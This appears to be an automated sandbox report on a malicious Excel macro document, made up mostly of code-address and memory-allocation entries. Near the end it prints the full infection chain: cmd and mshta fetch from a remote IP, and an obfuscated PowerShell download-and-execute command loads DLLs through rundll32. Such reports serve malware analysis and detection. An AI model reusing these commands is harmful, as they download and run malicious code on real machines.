                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_006145CD13_2_006145CD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0060F58F13_2_0060F58F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0062367213_2_00623672
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0060865013_2_00608650
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0061363D13_2_0061363D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0061561F13_2_0061561F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0060777B13_2_0060777B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0061275313_2_00612753
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0060472E13_2_0060472E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0062086713_2_00620867
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0061686413_2_00616864
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0060E86A13_2_0060E86A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0060C85013_2_0060C850
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0060B82113_2_0060B821
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0061183113_2_00611831
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0060283013_2_00602830
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_006088F413_2_006088F4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0061D8D713_2_0061D8D7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_006068DE13_2_006068DE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0061094613_2_00610946
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0060194C13_2_0060194C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0060195013_2_00601950
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0060F93D13_2_0060F93D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0061C9A913_2_0061C9A9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_006199AA13_2_006199AA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0062199313_2_00621993
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00609A7D13_2_00609A7D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0060CA4313_2_0060CA43
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00606A1F13_2_00606A1F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0060AB6613_2_0060AB66
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0060BB4B13_2_0060BB4B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00621B5413_2_00621B54
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00614B5613_2_00614B56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00612BF613_2_00612BF6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0061EBFF13_2_0061EBFF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00617BCA13_2_00617BCA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00607B8213_2_00607B82
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00606C2913_2_00606C29
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0061ACD313_2_0061ACD3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0061CC8913_2_0061CC89
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0060EC9B13_2_0060EC9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00618D7113_2_00618D71
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00613D4113_2_00613D41
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00620D5B13_2_00620D5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00610D3313_2_00610D33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0060BD0F13_2_0060BD0F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0060FD8C13_2_0060FD8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00608D9513_2_00608D95
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00606ED613_2_00606ED6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0061BE8C13_2_0061BE8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0061EE9413_2_0061EE94
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0060AE9A13_2_0060AE9A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0061FF3113_2_0061FF31
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0060CFCE13_2_0060CFCE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00602FA113_2_00602FA1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00603FB813_2_00603FB8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00601F9B13_2_00601F9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A04B814_2_002A04B8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002ABE8C14_2_002ABE8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029EC9B14_2_0029EC9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002AE49814_2_002AE498
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002AEE9414_2_002AEE94
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002970ED14_2_002970ED
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A5CF914_2_002A5CF9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A74DD14_2_002A74DD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029F93D14_2_0029F93D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029970014_2_00299700
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A351214_2_002A3512
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002B1B5414_2_002B1B54
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002AB39114_2_002AB391
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00298D9514_2_00298D95
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00296C2914_2_00296C29
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002AA42914_2_002AA429
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A542E14_2_002A542E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029B82114_2_0029B821
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A363D14_2_002A363D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029283014_2_00292830
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A183114_2_002A1831
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029B41A14_2_0029B41A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A561F14_2_002A561F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00296A1F14_2_00296A1F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A026B14_2_002A026B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029E86A14_2_0029E86A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002B146E14_2_002B146E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002B086714_2_002B0867
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A686414_2_002A6864
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00299A7D14_2_00299A7D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002B367214_2_002B3672
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029CA4314_2_0029CA43
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A504014_2_002A5040
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029E24314_2_0029E243
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029C85014_2_0029C850
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029865014_2_00298650
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002ACC8914_2_002ACC89
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029608314_2_00296083
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029AE9A14_2_0029AE9A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A109E14_2_002A109E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A129C14_2_002A129C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002944FA14_2_002944FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A64F114_2_002A64F1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002988F414_2_002988F4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002B04DE14_2_002B04DE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002968DE14_2_002968DE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002AACD314_2_002AACD3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002AD8D714_2_002AD8D7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00296ED614_2_00296ED6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029472E14_2_0029472E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A0D3314_2_002A0D33
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002AFF3114_2_002AFF31
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029C30914_2_0029C309
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029BD0F14_2_0029BD0F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029911A14_2_0029911A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029AB6614_2_0029AB66
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029777B14_2_0029777B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A8D7114_2_002A8D71
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029BB4B14_2_0029BB4B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029194C14_2_0029194C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A3D4114_2_002A3D41
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A094614_2_002A0946
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002B0D5B14_2_002B0D5B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029195014_2_00291950
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A275314_2_002A2753
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002AA15614_2_002AA156
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A4B5614_2_002A4B56
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029F15414_2_0029F154
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A99AA14_2_002A99AA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002AC9A914_2_002AC9A9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00292FA114_2_00292FA1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A41A714_2_002A41A7
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00293FB814_2_00293FB8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002AC38F14_2_002AC38F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029FD8C14_2_0029FD8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029F58F14_2_0029F58F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00297B8214_2_00297B82
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A918614_2_002A9186
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00291F9B14_2_00291F9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002B199314_2_002B1993
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002AEBFF14_2_002AEBFF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A2BF614_2_002A2BF6
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A7BCA14_2_002A7BCA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002AD3C814_2_002AD3C8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_002A45CD14_2_002A45CD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029CFCE14_2_0029CFCE
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00285CF916_2_00285CF9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0027970016_2_00279700
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0028A42916_2_0028A429
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0028542E16_2_0028542E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0027B82116_2_0027B821
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00276C2916_2_00276C29
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0028363D16_2_0028363D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0027283016_2_00272830
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0028183116_2_00281831
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0028561F16_2_0028561F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00276A1F16_2_00276A1F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0027B41A16_2_0027B41A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0028026B16_2_0028026B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0029146E16_2_0029146E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0028686416_2_00286864
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0027E86A16_2_0027E86A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0029086716_2_00290867
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_00279A7D16_2_00279A7D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0029367216_2_00293672
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0027CA4316_2_0027CA43
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0027E24316_2_0027E243
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0028504016_2_00285040
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0027C85016_2_0027C850
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0027865016_2_00278650
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_002804B816_2_002804B8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0028CC8916_2_0028CC89
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0027608316_2_00276083
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0028BE8C16_2_0028BE8C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0028E49816_2_0028E498
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0028129C16_2_0028129C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0028109E16_2_0028109E
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0027EC9B16_2_0027EC9B
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0028EE9416_2_0028EE94
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_0027AE9A16_2_0027AE9A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_002770ED16_2_002770ED
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_002788F416_2_002788F4
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_002864F116_2_002864F1
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 16_2_002744FA16_2_002744FA
                            Source: 36E8.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 98%
                            Source: DOCUMENT_2801.xlsMacro extractor: Sheet name: Macro3
                            Source: DOCUMENT_2801.xlsMacro extractor: Sheet name: Macro3
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and writeJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0029C67D DeleteService,14_2_0029C67D
                            Source: DOCUMENT_2801.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                            Source: C:\Users\user\Desktop\DOCUMENT_2801.xls, type: DROPPEDMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Hzcvqvi\Jump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10032B38 appears 108 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 100201F1 appears 34 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 100200FD appears 72 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10030D27 appears 288 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 1001F9FC appears 52 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10030D5A appears 82 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 100359C1 appears 46 times
                            Source: DOCUMENT_2801.xlsOLE indicator, VBA macros: true
                            Source: DOCUMENT_2801.xls.0.drOLE indicator, VBA macros: true
                            Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@25/9@1/35
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                            Source: DOCUMENT_2801.xlsOLE indicator, Workbook stream: true
                            Source: DOCUMENT_2801.xls.0.drOLE indicator, Workbook stream: true
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_100125C0 _printf,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,_malloc,11_2_100125C0
                            Source: DOCUMENT_2801.xlsReversingLabs: Detection: 16%
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: C:\Windows\System32\cmd.exeConsole Write: ...................J............M.i.c.r.o.s.o.f.t. .W.i.n.d.o.w.s. .[.V.e.r.s.i.o.n. .6...1...7.6.0.1.].................H.......................Jump to behavior
                            Source: C:\Windows\System32\cmd.exeConsole Write: ................L...............................d1......................8.Hb............`{.J.......J............8...............................Jump to behavior
                            Source: C:\Windows\System32\cmd.exeConsole Write: ................L...............................d1......................8.Hb............`{.J.......J....................~.......................Jump to behavior
                            Source: C:\Windows\System32\cmd.exeConsole Write: ................L...............................d1......................8.Hb............`{.J.......J............8...............................Jump to behavior
                            Source: C:\Windows\System32\cmd.exeConsole Write: ................L.......................................................x.Hb...............J.......J............x...............................Jump to behavior
                            Source: C:\Windows\System32\cmd.exeConsole Write: ................L...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J....................2..................J....Jump to behavior
                            Source: C:\Windows\System32\cmd.exeConsole Write: ................L.......................................................A....... ..J....................x..J............Z..................J....Jump to behavior
                            Source: C:\Windows\System32\cmd.exeConsole Write: ................L...............................`!-.....................x.Hb......,........J.......J............x...............................Jump to behavior
                            Source: C:\Windows\System32\cmd.exeConsole Write: ................L...............C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>..........J.... ..J....................2..................J....Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................................................`I.........v.....................K........w.............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................p.4k....................................}..v............0...............................................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....................p.4k..... ..............................}..v....H.......0.................w.............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k....................................}..v............0...............................................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................4k....x.w.............................}..v............0.................w.............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#...............`.4k....................................}..v....0.......0...............................................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#...............`.4k....(.w.............................}..v............0.................w.............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'.................4k....E...............................}..v............0...............x.w.............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+.................4k....E...............................}..v............0...............x.w.............................Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+.......P.S. .C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>. .......0.......................:.......................Jump to behavior
                            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c set ooo=mshta http://91.240.118.172/ee/ss/se.html & echo %ooo% | cmd
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo %ooo% "
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/ee/ss/se.html
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKat
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKat
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\Milossd.dll",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx",RIBFxhGufP
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf",RPzUMBQVQiRJfbr
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf",DllRegisterServer
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c set ooo=mshta http://91.240.118.172/ee/ss/se.html & echo %ooo% | cmdJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo %ooo% "Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmdJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/ee/ss/se.html Jump to behavior
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
